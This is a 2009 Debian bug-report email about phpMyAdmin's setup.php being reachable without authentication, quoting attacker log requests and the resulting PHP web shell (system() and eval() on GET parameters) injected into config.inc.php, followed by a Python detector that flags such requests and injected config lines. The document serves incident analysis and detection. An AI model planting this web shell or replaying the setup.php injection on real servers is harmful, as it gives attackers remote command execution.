On Tuesday 25 August 2009 22:55:45 you wrote:

> I am unclear on how this would work. You say you are using the etch
> version. It asks for setup.php credentials and then installs the relevant
> Apache configuration to fence the setup.php off. This process works for
> me.
> Can you please detail what it is that causes the lack of authentication?
> Can you reproduce this on a clean install or after a package purge?

I installed a fresh Debian etch and the phpmyadmin+php5+apache+mysql packages.
This is the result:

1) The phpmyadmin package installation doesn't ask for credentials

2) You can access the script http://{host}/phpmyadmin/scripts/setup.php
without entering a password

Package versions:

apache2: 2.2.3-4+etch10
phpmyadmin: 2.9.1.1-11
php5: 5.2.0+dfsg-8+etch15
mysql5: 5.0.32-7etch10

> Also even if you would be able to access setup.php, how would the code
> execution work exactly? Please provide an example.

I'm trying to figure out how this can be done, because the configuration is 
not writeable (both save and load buttons are disabled).

Looking into the logs I discover that the attacker looks for these files:

/phpmyadmin/scripts/setup.php
/phpmyadmin/js/keyhandler.js

And after he gets a 200 return code he performs a POST request:

POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 22713 "http://195.137.153.36/phpmyadmin/"; "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"

This is the next request (the content of base64_decode is 0x1337):

[17/Jul/2009:19:32:12 +0200] "GET /phpmyadmin/config/config.inc.php?p=echo%20base64_decode(MHgxMzM3); HTTP/1.1" 200 17 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"

The result is that /var/lib/phpmyadmin/config.inc.php contains:

$cfg['Servers'][$i]['host']=''; if($_GET['c'])
{echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p'])
{echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';

Consider that I (of course) have a root password for MySQL and there is no
password brute-force attack against phpMyAdmin in the logs...

Cheers,
-- 
Michele Bonera
www.mexicolindo.info
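The request chain Michele describes (a successful POST to scripts/setup.php, then parameterised GETs to config/config.inc.php carrying eval()/system() input) is easy to pick out of an Apache access log once you know the pattern. The following is an added example for the reader, not code from the bug report or from the phpmyadmin package. It parses Apache combined-format log lines, flags the setup.php POST, flags any query string sent to config.inc.php (a genuine config file takes no parameters), decodes base64_decode() literals such as the MHgxMzM3 seen above, and correlates the two per client address. It also scans a config.inc.php body for the kind of injected line quoted above. The log lines and the clean config line are constructed; the client addresses and referer host are placeholders; the path constants assume the Debian layout shown in the message.

```python
import re
import base64
import binascii
from urllib.parse import urlparse, unquote

# Constructed sample log lines (Apache combined format) modelled on the requests quoted
# in the message above; client addresses and the referer host are placeholders.
SAMPLE_LOG = """\
10.0.0.7 - - [17/Jul/2009:19:31:40 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 22713 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jul/2009:19:31:41 +0200] "GET /phpmyadmin/js/keyhandler.js HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jul/2009:19:31:55 +0200] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 22713 "http://example.invalid/phpmyadmin/" "Mozilla/5.0"
10.0.0.7 - - [17/Jul/2009:19:32:12 +0200] "GET /phpmyadmin/config/config.inc.php?p=echo%20base64_decode(MHgxMzM3); HTTP/1.1" 200 17 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jul/2009:19:33:02 +0200] "GET /phpmyadmin/config/config.inc.php?c=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Jul/2009:19:40:00 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

# The tampered line quoted from /var/lib/phpmyadmin/config.inc.php, preceded by one
# constructed clean line for contrast.
SAMPLE_CONFIG = """\
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
SETUP_PATH = "/phpmyadmin/scripts/setup.php"      # assumed Debian etch layout
CONFIG_PATH = "/phpmyadmin/config/config.inc.php"
# PHP constructs that have no business in a query string aimed at a config file,
# nor inside the config file itself.
PHP_SINKS = re.compile(r'\b(eval|system|passthru|shell_exec|exec|base64_decode)\s*\(', re.I)
B64_ARG = re.compile(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)", re.I)


def parse_query(qs):
    """Split a raw query string on '&' only (stable across Python versions) and unquote."""
    params = {}
    for pair in qs.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote(value))
    return params


def decode_b64_args(php_snippet):
    """Decode every base64_decode(...) literal in a PHP snippet, skipping malformed ones."""
    out = []
    for token in B64_ARG.findall(php_snippet):
        try:
            out.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            pass
    return out


def parse_line(line):
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_query(url.query)
    rec["status"] = int(rec["status"])
    return rec


def analyse_log(log_text):
    """Flag successful POSTs to setup.php and every parameterised hit on config.inc.php,
    noting whether the same client had already POSTed to setup.php."""
    findings = []
    posted_setup = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] == SETUP_PATH and rec["method"] == "POST" and rec["status"] == 200:
            posted_setup.add(rec["host"])
            findings.append({"kind": "setup_post", "host": rec["host"], "time": rec["time"]})
        elif rec["path"] == CONFIG_PATH and rec["query"]:
            values = [v for vs in rec["query"].values() for v in vs]
            findings.append({
                "kind": "config_query",
                "host": rec["host"],
                "time": rec["time"],
                "params": sorted(rec["query"]),
                "php_sinks": sorted({m.group(1).lower() for v in values for m in PHP_SINKS.finditer(v)}),
                "decoded_base64": [d for v in values for d in decode_b64_args(v)],
                "after_setup_post": rec["host"] in posted_setup,
            })
    return findings


def find_injected_config_lines(config_text):
    """Return (line_no, line) for config lines that feed request data into a PHP sink."""
    hits = []
    for n, line in enumerate(config_text.splitlines(), 1):
        if any(s in line for s in ("$_GET", "$_POST", "$_REQUEST")) or PHP_SINKS.search(line):
            hits.append((n, line))
    return hits


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f)
    for n, line in find_injected_config_lines(SAMPLE_CONFIG):
        print(f"config.inc.php:{n}: {line[:70]}...")
```

Run against a real log, replace SAMPLE_LOG with the file contents and check the `after_setup_post` flag: a config.inc.php hit with a query string is already a compromise indicator on its own, and the preceding setup.php POST from the same address tells you how the file was written.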
